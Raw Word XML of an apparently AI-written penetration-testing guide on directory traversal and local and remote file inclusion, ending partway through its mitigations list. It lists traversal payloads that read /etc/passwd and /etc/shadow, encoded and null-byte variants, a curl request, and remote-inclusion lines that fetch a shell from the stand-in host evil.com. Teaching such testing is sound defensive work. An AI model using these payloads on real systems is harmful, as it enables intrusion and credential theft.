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2FBBA" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve">Great, now we’re entering the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File &amp; Resource Attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> area of WSTG. Let’s cover </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Testing for Directory Traversal and File Inclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> step by step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156006C2" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:pict w14:anchorId="062F698E">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF00171" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧾</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing for Directory Traversal &amp; File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55741208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1. Why It Matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E4AFC5" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve">Applications often take </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user input to fetch files</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> (e.g., images, documents, configs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403803DD" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve">If input isn’t sanitized, attackers can request </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arbitrary files</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> from the server (e.g., /etc/passwd), or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF91352" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve">Force the server to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>include malicious code</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> → leading to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote Code Execution (RCE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5167090E" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D336DF" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Directory Traversal (Path Traversal):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> ../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED1294" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local File Inclusion (LFI):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> index.php?page=../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EEA47C" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote File Inclusion (RFI):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> index.php?page=http://evil.com/shell.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C291864" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:pict w14:anchorId="63F11DE3">
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F998B2C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2. What to Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107CDE78" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Directory Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216F6003" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>Check for access to sensitive system files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C31254" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA3060A" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>../../../../etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2BB28E" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>../../../../windows/win.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6DD46A" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>../../../../boot.ini</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427AD6C0" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>Variants with URL encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8D6155" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>..%2f..%2f..%2f..%2fetc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DBF510" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>..%c0%af..%c0%afetc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185531F8" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Local File Inclusion (LFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176AB1B1" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>If parameter is something like ?file=home.html, try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732F886C" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>?file=../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01918F20" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>?file=../../../../var/log/apache2/access.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C63B7" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Try </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>null-byte injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> (%00) if app appends .php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA39F2" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>?file=../../../../etc/passwd%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8DF5BF" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote File Inclusion (RFI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44196B64" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>Only if allow_url_include is enabled in PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E39AE5A" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>?page=http://evil.com/shell.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E27010" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve">Leads to </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remote shell execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF1E695" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:pict w14:anchorId="34147B3C">
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D27DAFD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3. How to Test (Tools &amp; Steps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D08F54C" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Manual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB75934" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Burp Suite Intruder/Fuzzer</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> → automate ../ payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E5C548" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Curl/Wget</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> → replay crafted requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE2722" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>curl "http://target.com/index.php?page=../../../../etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC0243C" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Automated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793AE663" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DirBuster / gobuster / ffuf</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> – brute force directories/files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A566F0" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap NSE Scripts</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> (http-vuln-cve2017-5638 etc.) – detect traversal/LFI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6AF282" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> – basic traversal/LFI payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E63F97" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:pict w14:anchorId="10C88A9C">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C225FF2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4. Example Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC78375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Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0AF05B" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:t>GET /app?file=../../../../etc/passwd HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B38628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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622EA816" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:t>GET /app?file=..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F341FD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Remote File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39375343" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:t>GET /index.php?page=http://evil.com/shell.txt HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A820EB4" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:pict w14:anchorId="787A4607">
          <v:rect id="_x0000_i1077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7ACF4F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5. Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246FBADB" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>Steal credentials (/etc/shadow).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D601D07" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>Leak system configs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B467B99" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:lastRenderedPageBreak/>
        <w:t>Access source code → discover API keys, DB passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A005F57" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LFI → RCE:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> If logs or session files contain PHP code, attacker can include them → execute commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5686BC" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RFI → Full compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417BDD7F" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:r w:rsidRPr="00AE753B">
        <w:pict w14:anchorId="05DD8610">
          <v:rect id="_x0000_i1078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ED2D13" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E706DE" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>allowlist</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE753B">
        <w:t xml:space="preserve"> for files (never trust user input for file paths).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF7219" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE753B">
        <w:t>Normalize paths (realpath(), canonicalization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C9283D" w14:textId="77777777" w:rsidR="00AE753B" w:rsidRPr="00AE753B" w:rsidRDefault="00AE753B" w:rsidP="00AE753B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
